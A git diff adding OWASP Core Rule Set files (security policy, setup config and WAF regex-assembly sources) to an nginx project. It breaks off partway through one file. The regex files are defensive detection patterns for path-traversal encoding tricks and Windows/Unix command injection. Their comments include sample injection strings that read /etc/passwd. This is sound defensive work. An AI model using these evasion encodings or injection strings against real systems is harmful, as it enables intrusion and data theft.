3600 6F0E 0BA1 6783 2158 8211 38EE ACA1 AB8A 6E72 +``` + +If the signature was good, the verification succeeded. If you see a warning like the above, it means you know our public key, but you are not trusting it. You can trust it by using the following method: + +```bash +gpg edit-key 36006F0E0BA167832158821138EEACA1AB8A6E72 +gpg> trust +Your decision: 5 (ultimate trust) +Are you sure: Yes +gpg> quit +``` + +Then you will see this result when verifying: +```bash +gpg --verify coreruleset-3.3.2.tar.gz.asc v3.3.2.tar.gz +gpg: Signature made Wed Jun 30 15:05:48 2021 CEST +gpg: using RSA key 36006F0E0BA167832158821138EEACA1AB8A6E72 +gpg: Good signature from "OWASP Core Rule Set " [ultimate] +``` + +## Reporting a Vulnerability + +We strive to make the OWASP ModSecurity CRS accessible to a wide audience of beginner and experienced users. +We welcome bug reports, false positive alert reports, evasions, usability issues, and suggestions for new detections. +Submit these types of non-vulnerability related issues via Github. +Please include your installed version and the relevant portions of your audit log. +False negative or common bypasses should [create an issue](https://github.com/coreruleset/coreruleset/issues/new) so they can be addressed. + +Do this before submitting a vulnerability using our email: +1) Verify that you have the latest version of OWASP CRS. +2) Validate which Paranoia Level this bypass applies to. If it works in PL4, please send us an email. +3) If you detected anything that causes unexpected behavior of the engine via manipulation of existing CRS provided rules, please send it by email. + +We also provide you with the [Sandbox project](https://coreruleset.org/docs/development/sandbox/), where you can test your bypass and report back to us. If testing using the sandbox, please include the `X-Unique-ID` from the response in your email. + +Our email is [security@coreruleset.org](mailto:security@coreruleset.org). You can send us encrypted email using the same GPG key we use to sign releases, fingerprint: `3600 6F0E 0BA1 6783 2158 8211 38EE ACA1 AB8A 6E72`. + +We are happy to work with the community to provide CVE identifiers for any discovered security issues if requested. + +If in doubt, feel free to reach out to us! + +The OWASP ModSecurity CRS Team. diff --git a/nginx/config/owasp-crs/SPONSORS.md b/nginx/config/owasp-crs/SPONSORS.md new file mode 100644 index 00000000..79900d90 --- /dev/null +++ b/nginx/config/owasp-crs/SPONSORS.md @@ -0,0 +1,9 @@ +## GOLD SPONSORS + +* F5 / NGINX +* Google +* United Security Providers + +## SILVER SPONSORS + +* Swiss Post diff --git a/nginx/config/owasp-crs/crs-setup.conf b/nginx/config/owasp-crs/crs-setup.conf new file mode 100644 index 00000000..8c808d10 --- /dev/null +++ b/nginx/config/owasp-crs/crs-setup.conf @@ -0,0 +1,103 @@ + + +# SecDefaultAction "phase:1,log,auditlog,pass" +# SecDefaultAction "phase:2,log,auditlog,pass" + +# SecDefaultAction "phase:1,nolog,auditlog,pass" +# SecDefaultAction "phase:2,nolog,auditlog,pass" + +# SecDefaultAction "phase:1,log,auditlog,deny,status:403" +# SecDefaultAction "phase:2,log,auditlog,deny,status:403" + +# SecDefaultAction "phase:1,log,auditlog,redirect:'http://%{request_headers.host}/',tag:'Host: %{request_headers.host}'" +# SecDefaultAction "phase:2,log,auditlog,redirect:'http://%{request_headers.host}/',tag:'Host: %{request_headers.host}'" + + +#SecAction \ +# "id:900000,\ +# phase:1,\ +# pass,\ +# t:none,\ +# nolog,\ +# setvar:tx.blocking_paranoia_level=1" + +#SecAction \ +# "id:900001,\ +# phase:1,\ +# pass,\ +# t:none,\ +# nolog,\ +# setvar:tx.detection_paranoia_level=1" + +#SecAction \ +# "id:900010,\ +# phase:1,\ +# pass,\ +# t:none,\ +# nolog,\ +# setvar:tx.enforce_bodyproc_urlencoded=1" + + +#SecAction \ +# "id:900100,\ +# phase:1,\ +# pass,\ +# t:none,\ +# nolog,\ +# setvar:tx.critical_anomaly_score=5,\ +# setvar:tx.error_anomaly_score=4,\ +# setvar:tx.warning_anomaly_score=3,\ +# setvar:tx.notice_anomaly_score=2" + +#SecAction \ +# "id:900110,\ +# phase:1,\ +# pass,\ +# t:none,\ +# nolog,\ +# setvar:tx.inbound_anomaly_score_threshold=5,\ +# setvar:tx.outbound_anomaly_score_threshold=4" + +#SecAction \ +# "id:900115,\ +# phase:1,\ +# pass,\ +# t:none,\ +# nolog,\ +# setvar:tx.reporting_level=4" + +#SecAction \ +# "id:900120,\ +# phase:1,\ +# pass,\ +# t:none,\ +# nolog,\ +# setvar:tx.early_blocking=1" + + +#SecAction \ +# "id:900130,\ +# phase:1,\ +# pass,\ +# t:none,\ +# nolog,\ +# setvar:tx.enable_default_collections=1" + + +#SecAction \ +# "id:900200,\ +# phase:1,\ +# pass,\ +# t:none,\ +# nolog,\ +# setvar:'tx.allowed_methods=GET HEAD POST OPTIONS'" + +# SecCollectionTimeout 600 + +SecAction \ + "id:900990,\ + phase:1,\ + pass,\ + t:none,\ + nolog,\ + setvar:tx.crs_setup_version=400" \ No newline at end of file diff --git a/nginx/config/owasp-crs/docs/README b/nginx/config/owasp-crs/docs/README new file mode 100644 index 00000000..aa961033 --- /dev/null +++ b/nginx/config/owasp-crs/docs/README @@ -0,0 +1,17 @@ +Welcome to the OWASP Core Rule Set (CRS) documentation. + +The latest version of the documentation can be read at: +https://coreruleset.org/docs/ + +The OWASP CRS documentation is generated by Hugo and is stored +in a separate Github repository: +https://github.com/coreruleset/documentation/ + +While the documentation is available as part of the CRS project, +it is provided in the form of a Git submodule. Using a Git +submodule allows us to update the documentation without making +changes to the main rule repository. + +You can download the documentation using git: + + git submodule update --init docs diff --git a/nginx/config/owasp-crs/plugins/README.md b/nginx/config/owasp-crs/plugins/README.md new file mode 100644 index 00000000..4c2cc9d4 --- /dev/null +++ b/nginx/config/owasp-crs/plugins/README.md @@ -0,0 +1,7 @@ +This is the folder where you install CRS plugins. + +See https://github.com/coreruleset/plugin-registry +for a list of registered official and 3rd party plugins. + +Plugins are documented in the CRS INSTALL file and +in also with said plugin registry. diff --git a/nginx/config/owasp-crs/plugins/empty-after.conf b/nginx/config/owasp-crs/plugins/empty-after.conf new file mode 100644 index 00000000..e69de29b diff --git a/nginx/config/owasp-crs/plugins/empty-before.conf b/nginx/config/owasp-crs/plugins/empty-before.conf new file mode 100644 index 00000000..e69de29b diff --git a/nginx/config/owasp-crs/plugins/empty-config.conf b/nginx/config/owasp-crs/plugins/empty-config.conf new file mode 100644 index 00000000..e69de29b diff --git a/nginx/config/owasp-crs/regex-assembly/920100.ra b/nginx/config/owasp-crs/regex-assembly/920100.ra new file mode 100644 index 00000000..aafa2868 --- /dev/null +++ b/nginx/config/owasp-crs/regex-assembly/920100.ra @@ -0,0 +1,23 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##!+ i + +##! Cover the GET method +##! | Path |--- Query ---| Fragment | +^get /[^?#]*(?:\?[^#\s]*)?(?:#[\S]*)?$ + +##! Cover the CONNECT method +##! Meth |----- IPv4 Address ------|- Port -| Protocol | +^connect (?:\d{1,3}\.){3}\d{1,3}\.?(?::\d+)?\s+[\w\./]+$ + +##! Meth |- Host --|Prt| Protocol | +^connect [\w\-\./]+:\d+\s+[\w\./]+$ + +##! Cover the OPTIONS method +##! Meth |*| Protocol | +^options \*\s+[\w\./]+$ + +##! Cover other methods of the form METHOD [[scheme]://[host][:port]]/path[?query][#fragment] protocol +##! Method ---|- Scheme:// -|- Host --|-- Port --| Path |--- Query ---| Fragment | Protocol | +^[a-z]{3,10}\s+(?:\w{3,7}?://[\w\-\./]*(?::\d+)?)?/[^?#]*(?:\?[^#\s]*)?(?:#[\S]*)?\s+[\w\./]+$ diff --git a/nginx/config/owasp-crs/regex-assembly/920120.ra b/nginx/config/owasp-crs/regex-assembly/920120.ra new file mode 100644 index 00000000..ef67c2e8 --- /dev/null +++ b/nginx/config/owasp-crs/regex-assembly/920120.ra @@ -0,0 +1,27 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##! The HTML entities included in the expression are a best guess selection of frequently +##! used entities. Including too many would further reduce the performance of the expression +##! but there may well be additional entities that would make sense to add to the list. +##! The official list of entities is hosted by the WHATWG: +##! https://html.spec.whatwg.org/multipage/named-characters.html#named-character-references + +##!+ i + +##!^ ^ +##!$ *$ + +&[aeiouclnrszg]acute; +&[cdelnrstz]caron; +&[cgklnrst]cedil; +&[aeioucghjswy]circ; +&[aeiou]grave; +&[au]ring; +&[anoi]tilde; +&[aeiouy]uml; +& +' +  +ø +[^'\";=] diff --git a/nginx/config/owasp-crs/regex-assembly/920260.ra b/nginx/config/owasp-crs/regex-assembly/920260.ra new file mode 100644 index 00000000..8bfd4a41 --- /dev/null +++ b/nginx/config/owasp-crs/regex-assembly/920260.ra @@ -0,0 +1,6 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##!+ i + +%uff[0-9a-f]{2} diff --git a/nginx/config/owasp-crs/regex-assembly/920521.ra b/nginx/config/owasp-crs/regex-assembly/920521.ra new file mode 100644 index 00000000..ac81329b --- /dev/null +++ b/nginx/config/owasp-crs/regex-assembly/920521.ra @@ -0,0 +1,18 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##! Current Accept-Encoding headers +br +compress +deflate +gzip +identity +\* +^$ +##! Deprecated Accept-Encoding headers +aes128gcm +exi +pack200-gzip +zstd +x-compress +x-gzip diff --git a/nginx/config/owasp-crs/regex-assembly/920600.ra b/nginx/config/owasp-crs/regex-assembly/920600.ra new file mode 100644 index 00000000..cdc7303b --- /dev/null +++ b/nginx/config/owasp-crs/regex-assembly/920600.ra @@ -0,0 +1,4 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##!> include charset-specification diff --git a/nginx/config/owasp-crs/regex-assembly/921421.ra b/nginx/config/owasp-crs/regex-assembly/921421.ra new file mode 100644 index 00000000..f796caec --- /dev/null +++ b/nginx/config/owasp-crs/regex-assembly/921421.ra @@ -0,0 +1,17 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##! Attacks attempting bypass by forcing JSON body processor leveraging recommended rule 200000 +##! Find Content-Type: application/x-www-form-urlencoded;boundary="application/json" +##! Find Content-Type: application/soap+xml;boundary="application/json" +^[^;\s,]+[;\s,].*?application\/json + +##! Attacks attempting bypass by forcing JSON body processor leveraging recommended rule 200006 +##! Find Content-Type: application/x-www-form-urlencoded;boundary="application/some.vendor+json" +##! Find Content-Type: application/soap+xml;boundary="application/some.vendor+json" +^[^;\s,]+[;\s,].*?application\/.+[+]json + +##! Attacks attempting bypass by forcing XML body processor leveraging recommended rule 200001 +##! Find Content-Type: application/x-www-form-urlencoded;boundary="application/xml" +##! Find Content-Type: application/json;boundary="application/soap+xml" +^[^;\s,]+[;\s,].*?(?:application(?:\/soap\+|\/)|text\/)xml diff --git a/nginx/config/owasp-crs/regex-assembly/921422.ra b/nginx/config/owasp-crs/regex-assembly/921422.ra new file mode 100644 index 00000000..5b70a561 --- /dev/null +++ b/nginx/config/owasp-crs/regex-assembly/921422.ra @@ -0,0 +1,9 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##! Attacks attempting to bypass content-type restrictions or behaviour +##! Find Content-Type: application/x-www-form-urlencoded;boundary="multipart/form-data" +##! Find Content-Type: application/soap-xml;boundary="multipart/form-data" +^[^;\s,]+[;\s,].*?\b(text|multipart|application)\b +^[^;\s,]+[;\s,].*?\b(audio|image|video|csv|css|vnd|pdf|plain|json|soap|xml|x-www-form-urlencoded|form-data|related|x-amf|octet|stream|csp|report)\b +^[^;\s,]+[;\s,].*?\b(\/|\+)\b diff --git a/nginx/config/owasp-crs/regex-assembly/922110-chain1.ra b/nginx/config/owasp-crs/regex-assembly/922110-chain1.ra new file mode 100644 index 00000000..cdc7303b --- /dev/null +++ b/nginx/config/owasp-crs/regex-assembly/922110-chain1.ra @@ -0,0 +1,4 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##!> include charset-specification diff --git a/nginx/config/owasp-crs/regex-assembly/930100.ra b/nginx/config/owasp-crs/regex-assembly/930100.ra new file mode 100644 index 00000000..769c9fae --- /dev/null +++ b/nginx/config/owasp-crs/regex-assembly/930100.ra @@ -0,0 +1,110 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##! Source: https://github.com/wireghoul/dotdotpwn/blob/master/DotDotPwn/TraversalEngine.pm +##! Attack description: https://doc.lagout.org/security/McGraw.Hill.HackNotes.Web.Security.Portable.Reference.eBook-DDU.pdf +##! Excerpt: +##! In short, IIS turns %c0%af into +##! the ASCII / character, but parses it at a point where security checks for +##! ‘../’ traversals have already occurred! +##! What has really happened? The attack uses an overlong Unicode +##! representation for a forward or backward slash (/ or \). +##! Unicode permits multibyte encoding of the same character. +##! The fundamental representation can be referred to as a one (character) to one (byte field) +##! representation. The overlong representation is a one (character) to many +##! (bytes) version. +##! Two more valid strings that represent the backward slash are %c1%1c +##! and %c1%9c. The difference between these two hex values is 128. More +##! valid slash representations boil down to a matter of math. For example, +##! %c0%9v works even though %9v isn’t a hexadecimal value. Try adding +##! the value for “9” (57) to “v” (118); if the result is greater than 127, then +##! subtract 128—hint, the final result should be 47. + +##!+ i + +##! slash patterns +##!> assemble + \x5c + ##! URI encoded + %2f + %5c + ##! Hex encoded + 0x2f + 0x5c + ##! Double URI encoded + %252f + %255c + ##! Overlong Unicode sequences (target IIS) + %c0%2f + %c0%af + %c0%5c + %c1%9c + %c1%pc + %c0%9v + %c0%qf + %c1%8s + %c1%1c + %c1%af + %bg%qf + ##! Unicode 16 "alternative" glyphs + %u2215 + %u2216 + ##! Unknown + %uEFC8 + %uF025 + ##! More double encoding and variations on the above + %%32%%66 + %%35%%63 + %e0%80%af + %25c1%259c + %25c0%25af + %f0%80%80%af + %f8%80%80%80%af + %2%46 + %%32%46 + %%32F + %u002f + %1u + / + ##!=< slashes + ##!=> slashes + + ##! dot patterns + ##! These use the same techniques as for slashes to evade the detection of '.' + \. + \.%00 + \.%01 + \.\? + \?\. + \? + %2e + 0x2e + %c0\. + %252e + %c0%2e + %c0%ae + %c0%5e + %c0%ee + %c0%fe + %uff0e + %%32%%65 + %e0%80%ae + %25c0%25ae + %f0%80%80%ae + %f8%80%80%80%ae + %fc%80%80%80%80%ae + %2%45 + %u002e + %uff0e + %u2024 + %%32%45 + %%32E + %c0%6e + ##!=> + + ##! Append {2,3} to the result, as we're looking for two or three dots (e.g. /../, /.../) + {2,3} + ##!=> + + ##!=> slashes +##!< diff --git a/nginx/config/owasp-crs/regex-assembly/931130.ra b/nginx/config/owasp-crs/regex-assembly/931130.ra new file mode 100644 index 00000000..558f5da4 --- /dev/null +++ b/nginx/config/owasp-crs/regex-assembly/931130.ra @@ -0,0 +1,17 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##! ATTENTION: The rule files 931130.data and 931131.data are meant to be kept in sync. +##! They should result in the same regular expression used on different targets in different phases. + +##!+ i + +##!> assemble + ##!=> + (?:(?:url|jar):)? + ##!=> + ##!> include url-schemes + ##!=> + ://(?:[^@]+@)?([^/]*) + ##!=> +##!< diff --git a/nginx/config/owasp-crs/regex-assembly/931131.ra b/nginx/config/owasp-crs/regex-assembly/931131.ra new file mode 100644 index 00000000..aef8b0ee --- /dev/null +++ b/nginx/config/owasp-crs/regex-assembly/931131.ra @@ -0,0 +1,17 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##! ATTENTION: The rule files 931129.data and 931131.data are meant to be kept in sync. +##! They should result in the same regular expression used on different targets in different phases. + +##!+ i + +##!> assemble + ##!=> + (?:(?:url|jar):)? + ##!=> + ##!> include url-schemes + ##!=> + ://(?:[^@]+@)?([^/]*) + ##!=> +##!< diff --git a/nginx/config/owasp-crs/regex-assembly/932125.ra b/nginx/config/owasp-crs/regex-assembly/932125.ra new file mode 100644 index 00000000..2a69987a --- /dev/null +++ b/nginx/config/owasp-crs/regex-assembly/932125.ra @@ -0,0 +1,235 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##! Word list for rule 932125 (RCE Windows command injection - PowerShell aliases) +##! +##! This list comes from the powershell source code. Can be updated using this oneliner: +##! curl -s https://raw.githubusercontent.com/PowerShell/PowerShell/master/src/System.Management.Automation/engine/InitialSessionState.cs -o - | awk -F\" '/new SessionStateAliasEntry\("/ { print $2; }' +##! To prevent some FP for a command, you can require command parameters +##! after a command. Only do this if the command regularly causes FP and if +##! allowing the bare command (without parameters) is not too dangerous. +##! (Note: due to \b following the regexp, a word boundary is also required +##! further on, so some letter/number is needed for a match). Example: +##! +##! diff@ + +##!+ i + +##! Note: the quoting prefixes are part of the command prefixes, except for ^ +##! which, for unknown reasons, is not part of the expression + +##! extension/switches suffix +##! cmd.com, cmd.exe, etc. +##!$ (?:\.[\"\^]*\w+)? +##! cmd/h +##!$ \b + +##! starting tokens prefix +##!> assemble + ##! ;cmd + ; + ##! {cmd + \{ + ##! |cmd + \| + ##! ||cmd + \|\| + ##! &cmd + & + ##! &&cmd + && + ##! \ncmd + \n + ##! \rcmd + \r + ##! `cmd + ` + ##!=> + + ##! match possible white space between prefix expressions + \s* + ##!=> + + ##! commands prefix + ##!> assemble + ##! (cmd) + \( + ##! ,cmd + , + ##! @cmd + @ + ##! 'cmd' + ' + ##! "cmd" + \" + ##! spacing+cmd + \s + ##!< + ##!=> + + * + ##!=> + + ##! paths prefix + ##!> assemble + ##! /path/cmd + [\w'\"\./]+/ + ##! C:\Program Files\cmd + [\x5c'\"\^]*\w[\x5c'\"\^]*:.*\x5c + ##! \\net\share\dir\cmd + [\^\.\w '\"/\x5c]*\x5c + ##!< + ##!=> + + ?[\"\^]* + ##!=> + + ##!> cmdline windows + + ac@ + asnp@ + cd@ + ##! disabled for FP: cat@ + chdir@ + clc@ + ##! disabled for FP: clear + clhy@ + cli@ + clp@ + cls + clv@ + cnsn + ##! disabled for FP: compare@ + ##! disabled for FP: copy@ + cp@ + cpi@ + cpp@ + cvpa@ + dbp@ + del@ + diff@ + dir@ + dnsn + ebp@ + epal@ + epcsv@ + epsn@ + ##! disabled for FP: erase@ + etsn@ + exsn@ + fc@ + fl@ + foreach@ + ft@ + fw@ + gal@ + gbp@ + gc@ + gci@ + gcm@ + gcs@ + gdr@ + gerr + ghy@ + gi@ + gjb@ + gl@ + gm@ + gmo@ + gp@ + gps@ + gpv + ##! disabled for FP: group + gsn@ + gsnp@ + gsv@ + gu@ + gv@ + gwmi@ + ##! disabled for FP: h + ##! disabled for FP: history + icm@ + iex@ + ihy@ + ii@ + ipal@ + ipcsv@ + ipmo@ + ipsn@ + irm@ + ise@ + iwmi@ + iwr@ + ##! disabled for FP: kill + ls + man@ + md@ + ##! disabled for FP: measure + mi@ + mount@ + ##! disabled for FP: move + mp@ + mv@ + nal@ + ndr@ + ni@ + nmo@ + npssc + nsn@ + nv@ + ogv@ + ##! disabled for FP: oh + popd@ + pushd@ + ##! disabled for FP: pwd + ##! disabled for FP: r + rbp@ + rcjb@ + rcsn + rd@ + rdr@ + ren@ + ri@ + rjb@ + rm@ + rmdir@ + rmo@ + rni@ + rnp@ + rp@ + rsn@ + rsnp@ + rujb + rv@ + rvpa@ + rwmi@ + sajb@ + sal@ + saps@ + sasv@ + sbp@ + sc@ + ##! disabled for FP: select + ##! disabled for FP: set + shcm + si@ + sl@ + ##! disabled for FP: sleep + sls@ + ##! disabled for FP: sort + sp@ + spjb@ + spps@ + spsv@ + ##! disabled for FP: start + sujb + sv@ + swmi@ + ##! disabled for FP: tee + trcm@ + ##! disabled for FP: type + ##! disabled for FP: where + wjb@ + ##! disabled for FP: write@ + ##!< +##!< diff --git a/nginx/config/owasp-crs/regex-assembly/932130.ra b/nginx/config/owasp-crs/regex-assembly/932130.ra new file mode 100644 index 00000000..b5ac4977 --- /dev/null +++ b/nginx/config/owasp-crs/regex-assembly/932130.ra @@ -0,0 +1,13 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +\$\(.*\) +\$\{.*\} +<\(.*\) +>\(.*\) +\$\(\(.*\)\) + +##! Find wordlist bypasses using [ ] glob characters, like: /e[t]c +##! Require a / in front to prevent false positives like [text in brackets] +/\w*\[!.+\] +/\w*\[.+\] diff --git a/nginx/config/owasp-crs/regex-assembly/932140.ra b/nginx/config/owasp-crs/regex-assembly/932140.ra new file mode 100644 index 00000000..ddab7e06 --- /dev/null +++ b/nginx/config/owasp-crs/regex-assembly/932140.ra @@ -0,0 +1,5 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +\bfor(?:/[dflr].*)? %+[^ ]+ in\(.*\)\s?do +\bif(?:/i)?(?: not)?(?: exist\b| defined\b| errorlevel\b| cmdextversion\b|(?: |\().*(?:\bgeq\b|\bequ\b|\bneq\b|\bleq\b|\bgtr\b|\blss\b|==)) diff --git a/nginx/config/owasp-crs/regex-assembly/932175.ra b/nginx/config/owasp-crs/regex-assembly/932175.ra new file mode 100644 index 00000000..afb7620e --- /dev/null +++ b/nginx/config/owasp-crs/regex-assembly/932175.ra @@ -0,0 +1,27 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##! Prevent command aliasing + +##! starting tokens prefix +##!> assemble + \b + ##!=> + ##!> cmdline unix + alias + ##!< + ##!=> + + ##! match white space between command and arguments + \b\s+ + ##!=> + + ##! match the alias name + ['"\w!%,@]+ + ##!=> + + ##! match equals something + =\S + ##!=> + +##!< diff --git a/nginx/config/owasp-crs/regex-assembly/932200.ra b/nginx/config/owasp-crs/regex-assembly/932200.ra new file mode 100644 index 00000000..e2dcc4d8 --- /dev/null +++ b/nginx/config/owasp-crs/regex-assembly/932200.ra @@ -0,0 +1,17 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##! - bar;cd+/etc;/bin$u/ca*+passwd +##! - foo;ca\t+/et\c/pa\s\swd +##! - foo;c'at'+/etc/pa's'swd +[*?`\x5c'][^/\n]+/ +/[^/]+?[*?`\x5c'] +##! - foo;cat$u+/etc$u/passwd +##! - foo;c$-at+/et$-c/pas$-swd +##! - foo;c$_at+/et$_c/pas$_swd +##! - foo;c$?at+/et$?c/pas$?swd +##! - foo;c$*at+/et$*c/pas$*swd +##! - foo;c$@at+/et$@c/pas$@swd +##! - foo;c$!at+/et$!c/pas$!swd +##! - foo;c$$at+/et$$c/pas$$swd +\$[({\[#@!?*\-_$a-zA-Z0-9] diff --git a/nginx/config/owasp-crs/regex-assembly/932205.ra b/nginx/config/owasp-crs/regex-assembly/932205.ra new file mode 100644 index 00000000..84695af3 --- /dev/null +++ b/nginx/config/owasp-crs/regex-assembly/932205.ra @@ -0,0 +1,29 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##! Prefix to prevent the first `?` (query string marker +##! in URLs) from matching any of the later expressions. +##! If the URL does not have a query string, then instead +##! look for the first `;`. +##! Prefix and suffix markers also form two capture groups +##! that are used for processing and logging in the rule. +##!^ ^[^.]+\.[^?;]+[?;](.*( +##!$ )) + +##! The following expressions in this file must be identical to the +##! ones in 932200. + +##! - bar;cd+/etc;/bin$u/ca*+passwd +##! - foo;ca\t+/et\c/pa\s\swd +##! - foo;c'at'+/etc/pa's'swd +[*?`\x5c'][^/\n]+/ +/[^/]+?[*?`\x5c'] +##! - foo;cat$u+/etc$u/passwd +##! - foo;c$-at+/et$-c/pas$-swd +##! - foo;c$_at+/et$_c/pas$_swd +##! - foo;c$?at+/et$?c/pas$?swd +##! - foo;c$*at+/et$*c/pas$*swd +##! - foo;c$@at+/et$@c/pas$@swd +##! - foo;c$!at+/et$!c/pas$!swd +##! - foo;c$$at+/et$$c/pas$$swd +\$[({\[#@!?*\-_$a-zA-Z0-9] diff --git a/nginx/config/owasp-crs/regex-assembly/932206.ra b/nginx/config/owasp-crs/regex-assembly/932206.ra new file mode 100644 index 00000000..dce24e55 --- /dev/null +++ b/nginx/config/owasp-crs/regex-assembly/932206.ra @@ -0,0 +1,25 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##! Prefix to ensure that the rule only matches when the +##! value of the Referer header is not a URL (illegal header +##! value). +##!^ ^[^.]*? + +##! The following expressions in this file must be identical to the +##! ones in 932200. + +##! - bar;cd+/etc;/bin$u/ca*+passwd +##! - foo;ca\t+/et\c/pa\s\swd +##! - foo;c'at'+/etc/pa's'swd +[*?`\x5c'][^/\n]+/ +/[^/]+?[*?`\x5c'] +##! - foo;cat$u+/etc$u/passwd +##! - foo;c$-at+/et$-c/pas$-swd +##! - foo;c$_at+/et$_c/pas$_swd +##! - foo;c$?at+/et$?c/pas$?swd +##! - foo;c$*at+/et$*c/pas$*swd +##! - foo;c$@at+/et$@c/pas$@swd +##! - foo;c$!at+/et$!c/pas$!swd +##! - foo;c$$at+/et$$c/pas$$swd +\$[({\[#@!?*\-_$a-zA-Z0-9] diff --git a/nginx/config/owasp-crs/regex-assembly/932210.ra b/nginx/config/owasp-crs/regex-assembly/932210.ra new file mode 100644 index 00000000..1d44a187 --- /dev/null +++ b/nginx/config/owasp-crs/regex-assembly/932210.ra @@ -0,0 +1,77 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##! This list can be updated using: +##! curl -ks https://raw.githubusercontent.com/sqlite/sqlite/master/src/shell.c.in | grep -oE '^\s+"(\.[a-z0-9]+)' | cut -f2 -d. + +##!^ ;\s*\.\s*[\"']? + +archive +auth +backup +bail +binary +cd +changes +check +clone +connection +databases +dbconfig +dbinfo +dump +echo +eqp +excel +exit +expert +explain +filectrl +fullschema +headers +help +import +imposter +indexes +iotrace +limit +lint +load +log +mode +nonce +nullvalue +once +open +output +parameter +print +progress +prompt +quit +read +recover +restore +save +scanstats +schema +selftest +separator +session +sh +sha3sum +shell +show +stats +system +tables +testcase +testctrl +timeout +timer +trace +unmodule +vfsinfo +vfslist +vfsname +width diff --git a/nginx/config/owasp-crs/regex-assembly/932220.ra b/nginx/config/owasp-crs/regex-assembly/932220.ra new file mode 100644 index 00000000..c2bc6307 --- /dev/null +++ b/nginx/config/owasp-crs/regex-assembly/932220.ra @@ -0,0 +1,25 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##! Word list for rule 932220 (RCE Unix command injection) +##! +##! This list comes from (and should be in sync) the `unix-shell.data` file. + +##! Not all of the prefixes for the command words will be legal. +##! We've decided to use the same prefix as in 932100 and 932105 here, +##! because we don't know exactly what things are possible after a pipe and +##! we don't want to overcomplicate things by introducing another prefix variation. +##! Not all of the prefixes matched by the expression will actually be valid. + +##!+ i + +##!^ .\| + +##!> assemble + \s* + ##!> include unix-shell-evasion-prefix + + ##!> cmdline unix + ##!> include-except unix-shell-upto3 unix-shell-fps-pl2 -- @ "" ~ "" + ##!< +##!< diff --git a/nginx/config/owasp-crs/regex-assembly/932230.ra b/nginx/config/owasp-crs/regex-assembly/932230.ra new file mode 100644 index 00000000..7b298ea6 --- /dev/null +++ b/nginx/config/owasp-crs/regex-assembly/932230.ra @@ -0,0 +1,21 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##! Word list for rule 932230 (RCE for commands of two and three character words) +##! +##! Per discussion in https://github.com/coreruleset/coreruleset/issues/2632, we decided +##! to extend the cmdline evasion regex, so we are applying the evasion to a subset of the +##! original 93210(0|5) rules: the subset of commands from two or three characters that might pose +##! a greater risk of false positives. + +##!+ i + +##!$ \b + +##!> assemble + ##!> include unix-shell-evasion-prefix + + ##!> cmdline unix + ##!> include-except unix-shell-upto3 unix-shell-fps-pl1 + ##!< +##!< diff --git a/nginx/config/owasp-crs/regex-assembly/932231.ra b/nginx/config/owasp-crs/regex-assembly/932231.ra new file mode 100644 index 00000000..22b5e8b8 --- /dev/null +++ b/nginx/config/owasp-crs/regex-assembly/932231.ra @@ -0,0 +1,21 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##! Word list for rule 932231 (RCE Unix command injection part 3/4) +##! +##! To prevent some FP for a command, you can require command parameters +##! after a command. Only do this if the command regularly causes FP and if +##! allowing the bare command (without parameters) is not too dangerous. +##! (Note: due to \b following the regexp, a word boundary is also required +##! further on, so some letter/number is needed for a match). Example: +##! +##! diff+ + +##! Special regexp case for the '.' (source) command to prevent FP: + + +##!> assemble + ##!> include unix-shell-evasion-prefix + + \.\s.*\b +##!< diff --git a/nginx/config/owasp-crs/regex-assembly/932232.ra b/nginx/config/owasp-crs/regex-assembly/932232.ra new file mode 100644 index 00000000..50af9d01 --- /dev/null +++ b/nginx/config/owasp-crs/regex-assembly/932232.ra @@ -0,0 +1,16 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##! Word list for rule 932232 (RCE Unix command injection part 4/4) + +##!$ \b + +##!> assemble + ##!> include unix-shell-evasion-prefix + + ##!> assemble + ##!> cmdline unix + ##!> include unix-shell-pl3 + ##!< + ##!< +##!< diff --git a/nginx/config/owasp-crs/regex-assembly/932235.ra b/nginx/config/owasp-crs/regex-assembly/932235.ra new file mode 100644 index 00000000..0cc7ae30 --- /dev/null +++ b/nginx/config/owasp-crs/regex-assembly/932235.ra @@ -0,0 +1,11 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##!+ i + +##!> include unix-shell-evasion-prefix + +##! These patterns are approximations of the patterns used by the cmdline +##! processor for `@` and `~`. +##! These patterns are used across multiple files, change with care. +##!> include unix-shell-4andup -- @ [\s<>&|)] ~ \S diff --git a/nginx/config/owasp-crs/regex-assembly/932236.ra b/nginx/config/owasp-crs/regex-assembly/932236.ra new file mode 100644 index 00000000..a456d1d1 --- /dev/null +++ b/nginx/config/owasp-crs/regex-assembly/932236.ra @@ -0,0 +1,21 @@ +##! Please refer 